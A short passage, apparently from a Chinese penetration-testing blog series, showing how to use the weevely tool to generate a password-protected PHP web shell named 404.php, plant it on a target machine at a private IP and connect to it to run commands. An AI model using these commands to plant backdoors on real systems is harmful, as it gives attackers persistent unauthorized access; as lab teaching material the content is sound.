12. Persistent back door ----

Persistent back door

Generate PHP shell

weevely generate 密码 /root/Desktop/404.php
靶机IP/404.php
weevely http://192.168.1.108/404.php 密码
下一步就是命令与执行了,比如ls

Guess you like

Origin www.cnblogs.com/sec875/p/11366831.html
Recommended